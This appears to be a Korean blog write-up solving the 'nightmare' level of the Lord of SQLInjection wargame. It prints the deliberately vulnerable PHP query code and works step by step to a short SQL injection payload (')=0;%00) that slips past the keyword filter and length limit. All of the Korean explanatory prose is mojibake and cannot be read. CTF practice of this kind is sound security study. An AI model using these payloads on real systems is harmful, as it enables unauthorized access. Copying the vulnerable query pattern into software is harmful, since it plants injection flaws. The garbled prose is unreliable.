Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

nightmare

Kortsec1 2023. 8. 3. 22:31

1. Code

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])>6) exit("No Hack ~_~"); 
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("nightmare"); 
  highlight_file(__FILE__); 
?>

 

2. Condition

  • prob _ . () # - ๋ฅผ ํ•„ํ„ฐ๋ง ํ•œ๋‹ค.
  • strlen ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด GET ํŒŒ๋ผ๋ฏธํ„ฐ pw์˜ ๊ธธ์ด๋ฅผ 6์ดํ•˜๋กœ ์ œํ•œํ•œ๋‹ค.

 

3. Solution

์šฐ์„  ์ œํ•œ์ด ์—†๋‹ค๊ณ  ๊ฐ€์ •ํ•˜๊ณ , ์ฐจ๊ทผ์ฐจ๊ทผ ํ•„์š”ํ•œ ๋ถ€๋ถ„์„ ์ž‘์„ฑํ•ด ๋ณด์ž.

 

select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'

๋ณ€์ˆ˜๋ช… ๊ฐ’
pw ') or 1=1#

 

 

๋‹ค์Œ์œผ๋กœ ํ•„ํ„ฐ๋ง์„ ์šฐํšŒํ•ด ๋ณด์ž.

์œ„ ์ฟผ๋ฆฌ์—์„œ๋Š” #์ด ํ•„ํ„ฐ๋ง์— ๊ฑธ๋ฆฌ๊ฒŒ ๋œ๋‹ค.

#๊ณผ -๋ชจ๋‘ ํ•„ํ„ฐ๋ง ๋˜์–ด, ;%00์„ ์ด์šฉํ•˜์—ฌ ์šฐํšŒํ•ด ์ฃผ์—ˆ๋‹ค.

๋ณ€์ˆ˜๋ช… ๊ฐ’
pw ') or 1=1;%00

 

 

๋‘๋ฒˆ์งธ๋กœ ๊ธธ์ด๋ฅผ ๋งž์ถฐ๋ณผ ๊ฒƒ์ด๋‹ค.

ํ˜„์žฌ ์ฟผ๋ฆฌ์˜ ๊ธธ์ด๋Š” 11์ด๋‹ค. or ์น˜ํ™˜๋งŒ์œผ๋กœ๋Š” 6์ดํ•˜๋ฅผ ๋งŒ์กฑ์‹œํ‚ฌ ์ˆ˜ ์—†๋‹ค.

๋…ผ๋ฆฌ๊ฐ’์„ ๋ฐ”๊ฟ”์ฃผ์–ด ๊ฐ„์‹ ํžˆ ๊ธธ์ด 6์„ ๋งž์ถœ ์ˆ˜ ์žˆ์—ˆ๋‹ค.

๋ณ€์ˆ˜๋ช… ๊ฐ’
pw ')=0;%00

 

 

์œ„ ๊ฐ’์„ ์ตœ์ข…์ ์œผ๋กœ ์ž…๋ ฅํ•ด์ฃผ๋ฉด ๋ฌธ์ œ๊ฐ€ ํ•ด๊ฒฐ๋œ๋‹ค.

img_1 nightmare clear

 

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

dragon  (0) 2023.08.03
xavis  (0) 2023.08.03
zombie_assasin  (0) 2023.08.03
succubus  (0) 2023.08.01

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€nightmare

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”